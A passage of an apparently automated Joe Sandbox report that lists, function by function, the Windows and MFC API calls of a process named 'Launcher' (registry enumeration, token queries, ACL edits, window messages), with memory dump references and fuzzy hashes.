                                                                                                      • Part of subcall function 00670A74: #609.MFC42U(?,0066D810,?,0066D83D), ref: 00670A90
                                                                                                      • Part of subcall function 00670A74: #609.MFC42U(?,0066D810,?,0066D83D), ref: 00670A9B
                                                                                                      • Part of subcall function 00670A74: #609.MFC42U(?,0066D810,?,0066D83D), ref: 00670AA6
                                                                                                      • Part of subcall function 00670A74: #609.MFC42U(?,0066D810,?,0066D83D), ref: 00670AAE
                                                                                                      • Part of subcall function 0066C53F: #693.MFC42U(?,0066C5BD), ref: 0066C550
                                                                                                      • Part of subcall function 0066C53F: #609.MFC42U(?,0066C5BD), ref: 0066C55B
                                                                                                      • Part of subcall function 0066C53F: #609.MFC42U(?,0066C5BD), ref: 0066C566
                                                                                                      • Part of subcall function 0066C53F: #609.MFC42U(?,0066C5BD), ref: 0066C56E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #609$#800$#795$#656#693#804#810$#616
                                                                                                    • String ID:
                                                                                                    • API String ID: 1443703491-0
                                                                                                    • Opcode ID: 312852217900670b4ef4d38c0380b433334b71deb7a79cdb575afd581cd9e417
                                                                                                    • Instruction ID: c39662b069fb04e4734997c8e9e280f159d932cde1ac40e1bf109861965dae7b
                                                                                                    • Opcode Fuzzy Hash: 312852217900670b4ef4d38c0380b433334b71deb7a79cdb575afd581cd9e417
                                                                                                    • Instruction Fuzzy Hash: 58F0A431414A168AC378FB30D4515EA73E3BF58314F9186ADA0AF02056EF653909CF84
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #800$#609#656
                                                                                                    • String ID:
                                                                                                    • API String ID: 1737153938-0
                                                                                                    • Opcode ID: 1c8513a5f102b93a974850fb6b3ee44784ec6139a7436323a0b7cdf76a1f3e59
                                                                                                    • Instruction ID: 872f615ba2c56d1a896ca3dabb58d9a76129ec35a230381b9c9124b99db76f08
                                                                                                    • Opcode Fuzzy Hash: 1c8513a5f102b93a974850fb6b3ee44784ec6139a7436323a0b7cdf76a1f3e59
                                                                                                    • Instruction Fuzzy Hash: 48E0EC35040912C7C375EF20C592AE9B7A3AF64720F50896EE5AB03591FF706A09CB44
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(Kernel32.dll), ref: 0066B468
                                                                                                    • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 0066B479
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: HeapSetInformation$Kernel32.dll
                                                                                                    • API String ID: 1646373207-3460614246
                                                                                                    • Opcode ID: 3ff3cb2c1f2c9f1dc9a04ad832f1dc6f304431c1e0033eb13058d8dea4c6d88a
                                                                                                    • Instruction ID: 41185fd2478cf8a78de1d2b6ee151dbc41c2ac71f548e7f9165f98e4112af406
                                                                                                    • Opcode Fuzzy Hash: 3ff3cb2c1f2c9f1dc9a04ad832f1dc6f304431c1e0033eb13058d8dea4c6d88a
                                                                                                    • Instruction Fuzzy Hash: 57D05E70B123227BDB6027F1BD0CABB2EDF9B00B917051510BA05E6294DE60CC4087A1
                                                                                                    APIs
                                                                                                    • #861.MFC42U(?,00000001), ref: 006739C4
                                                                                                    • #6325.MFC42U(?,00000001,00000000), ref: 00673A4F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #6325#861
                                                                                                    • String ID:
                                                                                                    • API String ID: 3876780826-0
                                                                                                    • Opcode ID: f01b3ad60479f8913b66473ad970c39de067e67da35f23cb55fd137020a3a045
                                                                                                    • Instruction ID: bb6dbb11ca301ca110c6e3ced454fe6572a2c25929c606b4664cbf32624970a4
                                                                                                    • Opcode Fuzzy Hash: f01b3ad60479f8913b66473ad970c39de067e67da35f23cb55fd137020a3a045
                                                                                                    • Instruction Fuzzy Hash: D841F571E10218EFCB41DF98C841BADBBB2BF49314F208099E909AB391D771AE40DF55
                                                                                                    APIs
                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002,00000000,00000000,00000000,?,?,?,?,?,0067C6E4,00000000,00000000), ref: 0067C83D
                                                                                                    • GetAce.ADVAPI32(?,00000000,?,?,?,?,?,?,0067C6E4,00000000,00000000), ref: 0067C854
                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?,?,?,?,?,?,0067C6E4,00000000,00000000), ref: 0067C86C
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,0067C6E4,00000000,00000000), ref: 0067C88F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorInformationLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 3635006208-0
                                                                                                    • Opcode ID: ef7356f0499d9b95027df2e1c2084fe3d63f9dc17ffdf4bc759c429c937d0aee
                                                                                                    • Instruction ID: ca1b8514820fecad6c29742ba7020ed415778f115a89d786b7eb2fc9706dc793
                                                                                                    • Opcode Fuzzy Hash: ef7356f0499d9b95027df2e1c2084fe3d63f9dc17ffdf4bc759c429c937d0aee
                                                                                                    • Instruction Fuzzy Hash: CA11A771700115ABD710DBB59C45FBFBBAEBB45B20B10812DB919E6280DB30DD01D7B2
                                                                                                    APIs
                                                                                                    • RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000040), ref: 0067743B
                                                                                                    • RegOpenKeyW.ADVAPI32(00000000,?,?), ref: 0067745D
                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000040), ref: 00677496
                                                                                                    • RegQueryValueW.ADVAPI32(?,?,?,00000208), ref: 006774C9
                                                                                                    • CLSIDFromString.OLE32(00000000,-00000008), ref: 00677570
                                                                                                    • wcstol.MSVCRT ref: 00677610
                                                                                                    • wcsrchr.MSVCRT ref: 0067762C
                                                                                                    • wcstol.MSVCRT ref: 00677650
                                                                                                    • wsprintfW.USER32 ref: 00677696
                                                                                                    • wsprintfW.USER32 ref: 006776B9
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00677743
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00677754
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseEnumwcstolwsprintf$FromOpenQueryStringValuewcsrchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 1473628064-0
                                                                                                    • Opcode ID: c772abc5d35c02225d37bbffd54929579b68b8858473755b2dc7859f4ae2e03b
                                                                                                    • Instruction ID: 0f7b1350c0d64a32ee3c44e551c35660223d1608153d374b0cfc5286a6405ef6
                                                                                                    • Opcode Fuzzy Hash: c772abc5d35c02225d37bbffd54929579b68b8858473755b2dc7859f4ae2e03b
                                                                                                    • Instruction Fuzzy Hash: 22219F71D0822DAEEB65DB60CC84BE9B7B9EB04305F0051E9E60DA6150DB786F84EF51
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0066CEE9
                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0066CF05
                                                                                                    • #3297.MFC42U(00000000,00000001,?,00000028), ref: 0066CF30
                                                                                                    • #2637.MFC42U(00000001,00000000,00000001,?,00000028), ref: 0066CF39
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$#2637#3297
                                                                                                    • String ID:
                                                                                                    • API String ID: 837686103-0
                                                                                                    • Opcode ID: 2cf10de8a80631ada4dd30ec5f74b691a09a0351dcaf6dbc580776d6396593d4
                                                                                                    • Instruction ID: d0a55177043bd03e58f35062eac78483c7af8f238cbef64f351029d4dbc924e6
                                                                                                    • Opcode Fuzzy Hash: 2cf10de8a80631ada4dd30ec5f74b691a09a0351dcaf6dbc580776d6396593d4
                                                                                                    • Instruction Fuzzy Hash: 91F0C2323407517BF3205A65DC8AFE7BB5BFB80B60F014125FA45AA0C1CBB26C1587A5
                                                                                                    APIs
                                                                                                    • EnterCriticalSection.KERNEL32(00683B00,?,?,0066B731,00683998), ref: 0067F268
                                                                                                    • LeaveCriticalSection.KERNEL32(00683B00,?,?,0066B731,00683998), ref: 0067F29B
                                                                                                    • SetEvent.KERNEL32(00000000,0066B731,00683998), ref: 0067F32B
                                                                                                    • ResetEvent.KERNEL32 ref: 0067F337
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalEventSection$EnterLeaveReset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3553466030-0
                                                                                                    • Opcode ID: 22d7621241a24a01abf7f8f1aa9e7ce1071329b7d1aadc847a0b448c110b7262
                                                                                                    • Instruction ID: d6ea45f512c1024b378d71751bcf04b79b58337fc9606f7c2f8111b67187c9e8
                                                                                                    • Opcode Fuzzy Hash: 22d7621241a24a01abf7f8f1aa9e7ce1071329b7d1aadc847a0b448c110b7262
                                                                                                    • Instruction Fuzzy Hash: E9012875600270BBCB04AF98FC5CE997BA7FB59F117026229E906D7320CB70AA41CB94
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000000,?,?,0067CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0067CAF9
                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,0067CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0067CB00
                                                                                                    • GetLastError.KERNEL32(?,?,0067CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0067CB0A
                                                                                                      • Part of subcall function 0067CB3B: GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,00000000,?,?,?,?,0067CB28,00000000,00000000,?), ref: 0067CB71
                                                                                                      • Part of subcall function 0067CB3B: GetLastError.KERNEL32(?,?,?,0067CB28,00000000,00000000,?,?,?,0067CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0067CB77
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,0067CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0067CB2D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastProcessToken$CloseCurrentHandleInformationOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1647960853-0
                                                                                                    • Opcode ID: 93a5036000dfc67a5a8909940bcdce7f27201d080574d7ff9233993e894ab042
                                                                                                    • Instruction ID: 23660f826945b2a173667fd14eac531a9f381b088d1965c45dd94b79cd33dc1f
                                                                                                    • Opcode Fuzzy Hash: 93a5036000dfc67a5a8909940bcdce7f27201d080574d7ff9233993e894ab042
                                                                                                    • Instruction Fuzzy Hash: 56F04971600115FFC7109FB59C09AAB7BBAFF55B61B118119B949D7210EA34DD00D7A0
                                                                                                    APIs
                                                                                                    • #6330.MFC42U(00000001), ref: 0066EEC9
                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0066EEDE
                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0066EEF2
                                                                                                    • #2634.MFC42U(00000001), ref: 0066EF13
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$#2634#6330
                                                                                                    • String ID:
                                                                                                    • API String ID: 3857549013-0
                                                                                                    • Opcode ID: 2f9be5996c58761e801cf612a9069b80c797ccc40cbaecaeb01519792c8ddbf2
                                                                                                    • Instruction ID: b1ef3349dfbd3ff14c5ae1a0ed56212a235d75850c5eb3ea1c789f8adea29c73
                                                                                                    • Opcode Fuzzy Hash: 2f9be5996c58761e801cf612a9069b80c797ccc40cbaecaeb01519792c8ddbf2
                                                                                                    • Instruction Fuzzy Hash: 01F0A0741046447BE7325632DD8EED7BABBDBC2751F91041DF10982162CB731C41C720
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 0066E41E
                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0066E436
                                                                                                      • Part of subcall function 0066E583: #6211.MFC42U(?,0000130B,?,?,0066D5AA,00000000), ref: 0066E5BE
                                                                                                      • Part of subcall function 0066E583: RedrawWindow.USER32(?,00000000,00000000,00000105,?,0000130B,?,?,0066D5AA,00000000), ref: 0066E669
                                                                                                    • SendMessageW.USER32(?,00001309,00000000,00000000), ref: 0066E451
                                                                                                    • #6211.MFC42U(00000000), ref: 0066E45E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$#6211$RedrawWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1685024686-0
                                                                                                    • Opcode ID: 9a3d84e6a955d869259c30f7d2f34b338415890b8a9b028e7a9c8ef84ede68a1
                                                                                                    • Instruction ID: 1ec9c85aec6d29c651e444181b3418d6b65d9b775f725e2c53906804c4691cf4
                                                                                                    • Opcode Fuzzy Hash: 9a3d84e6a955d869259c30f7d2f34b338415890b8a9b028e7a9c8ef84ede68a1
                                                                                                    • Instruction Fuzzy Hash: 3FF0AC355145507AE7311626EC1DDC76EFEEBC6B11B06151CF21E960609B652941CAA0
                                                                                                    APIs
                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 0066C6C5
                                                                                                    • SetCursor.USER32(00000000), ref: 0066C6CC
                                                                                                      • Part of subcall function 0066C6F3: SendMessageW.USER32(?,00001009,00000000,00000000), ref: 0066C722
                                                                                                      • Part of subcall function 0066C6F3: SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 0066C78D
                                                                                                      • Part of subcall function 0066C6F3: SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 0066C79D
                                                                                                      • Part of subcall function 0066C6F3: #2634.MFC42U(00000001,?,?,?,?), ref: 0066C7C8
                                                                                                      • Part of subcall function 0066C6F3: #2634.MFC42U(00000001,00000001,?,?,?,?), ref: 0066C7D4
                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0066C6DF
                                                                                                    • SetCursor.USER32(00000000), ref: 0066C6E6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cursor$MessageSend$#2634Load
                                                                                                    • String ID:
                                                                                                    • API String ID: 1037744270-0
                                                                                                    • Opcode ID: 5702265d392121d069bd9ae11c8d6ea6d0ffe0fc82801fcb9157263573a48c35
                                                                                                    • Instruction ID: 8f8ab78a3bbe6193e26037f0614c055a5aa64d8aec950fbf54314cb5c7085276
                                                                                                    • Opcode Fuzzy Hash: 5702265d392121d069bd9ae11c8d6ea6d0ffe0fc82801fcb9157263573a48c35
                                                                                                    • Instruction Fuzzy Hash: 91E0ED33600611BBC701AFE1AC4C99B7B1EEF873613010022FA169F102CFB86805C7E4
                                                                                                    APIs
                                                                                                    • #2294.MFC42U(?,0000009E,?), ref: 0066D907
                                                                                                    • #2294.MFC42U(?,00000076,?,?,0000009E,?), ref: 0066D918
                                                                                                    • #2294.MFC42U(?,00000077,?,?,00000076,?,?,0000009E,?), ref: 0066D929
                                                                                                    • #2294.MFC42U(?,0000007E,?,?,00000077,?,?,00000076,?,?,0000009E,?), ref: 0066D93A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #2294
                                                                                                    • String ID:
                                                                                                    • API String ID: 314497554-0
                                                                                                    • Opcode ID: 38d839ec5628c691d1e75c880db02bd680a19cfe716b3d28e5ce9fead809fa45
                                                                                                    • Instruction ID: 2490dc431215104efe50e801b183f7bcdc88f64f006f34cd4c4637ee8358ca26
                                                                                                    • Opcode Fuzzy Hash: 38d839ec5628c691d1e75c880db02bd680a19cfe716b3d28e5ce9fead809fa45
                                                                                                    • Instruction Fuzzy Hash: 28F06C3160450C7AD710DA60DC02FBAB75EFB49740F444066BA1C85091C7B6B975CED4
                                                                                                    APIs
                                                                                                    • #2294.MFC42U(?,000000A2,?), ref: 00670B04
                                                                                                    • #2294.MFC42U(?,000000A6,?,?,000000A2,?), ref: 00670B18
                                                                                                    • #2294.MFC42U(?,00000095,?,?,000000A6,?,?,000000A2,?), ref: 00670B2C
                                                                                                    • #2294.MFC42U(?,00000070,?,?,00000095,?,?,000000A6,?,?,000000A2,?), ref: 00670B3D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #2294
                                                                                                    • String ID:
                                                                                                    • API String ID: 314497554-0
                                                                                                    • Opcode ID: 961d691974a4967dd907121e1fa605c3179baf25f2b816294cbf1f2652f2475c
                                                                                                    • Instruction ID: 2e85536d4921b11f75dee48f9bc0051d7a5a6eae83da0b3bfd8bc2f3aa6be60d
                                                                                                    • Opcode Fuzzy Hash: 961d691974a4967dd907121e1fa605c3179baf25f2b816294cbf1f2652f2475c
                                                                                                    • Instruction Fuzzy Hash: 0CF0EC312405087ED7519A21CC06FD5B76DEB45300F408032BA1C850A1DB72A979DBD4
                                                                                                    APIs
                                                                                                    • #2294.MFC42U(?,00000093,?), ref: 0066CAB4
                                                                                                    • #2294.MFC42U(?,0000008E,?,?,00000093,?), ref: 0066CAC8
                                                                                                    • #2293.MFC42U(?,00000080,?,?,0000008E,?,?,00000093,?), ref: 0066CADC
                                                                                                    • #2362.MFC42U(?,00000082,?,?,00000080,?,?,0000008E,?,?,00000093,?), ref: 0066CAF0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #2294$#2293#2362
                                                                                                    • String ID:
                                                                                                    • API String ID: 983985581-0
                                                                                                    • Opcode ID: da330a662afc8fc8bf956b6e53a61390e624d0649671c4ba55d989809ef528fb
                                                                                                    • Instruction ID: 9fb5d48da0f6ef2f40d4adc845f1ad0505011377b211fc4b8a15f440f9340d72
                                                                                                    • Opcode Fuzzy Hash: da330a662afc8fc8bf956b6e53a61390e624d0649671c4ba55d989809ef528fb
                                                                                                    • Instruction Fuzzy Hash: 05F065322405097AD7519A50DC02FEABB5EFB44710F40C136BA1C864A1DBB2AA69DBD4
                                                                                                    APIs
                                                                                                    • #2294.MFC42U(?,000000A2,?), ref: 0066C634
                                                                                                    • #2294.MFC42U(?,000000A6,?,?,000000A2,?), ref: 0066C648
                                                                                                    • #2294.MFC42U(?,00000095,?,?,000000A6,?,?,000000A2,?), ref: 0066C65C
                                                                                                    • #2294.MFC42U(?,00000070,?,?,00000095,?,?,000000A6,?,?,000000A2,?), ref: 0066C66D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #2294
                                                                                                    • String ID:
                                                                                                    • API String ID: 314497554-0
                                                                                                    • Opcode ID: 99eeaa3b270ed1fea4ed126587ffeb075330a1d6fcb3241ea659cc9ab8150847
                                                                                                    • Instruction ID: b24c6dd42ad6612dc09d0a6c439b0c7af9098ab8b65ab84addd417bc92c21f61
                                                                                                    • Opcode Fuzzy Hash: 99eeaa3b270ed1fea4ed126587ffeb075330a1d6fcb3241ea659cc9ab8150847
                                                                                                    • Instruction Fuzzy Hash: 58F06C71240509BEE7119A51DC07F95B75EEB45740F40C036BA1C850A1D772A975DBD4
                                                                                                    APIs
                                                                                                      • Part of subcall function 0067FB48: GetModuleHandleW.KERNEL32(00000000), ref: 0067FB4F
                                                                                                    • __set_app_type.MSVCRT ref: 0067ED92
                                                                                                    • __p__fmode.MSVCRT ref: 0067EDA8
                                                                                                    • __p__commode.MSVCRT ref: 0067EDB6
                                                                                                    • __setusermatherr.MSVCRT ref: 0067EDD7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                    • String ID:
                                                                                                    • API String ID: 1632413811-0
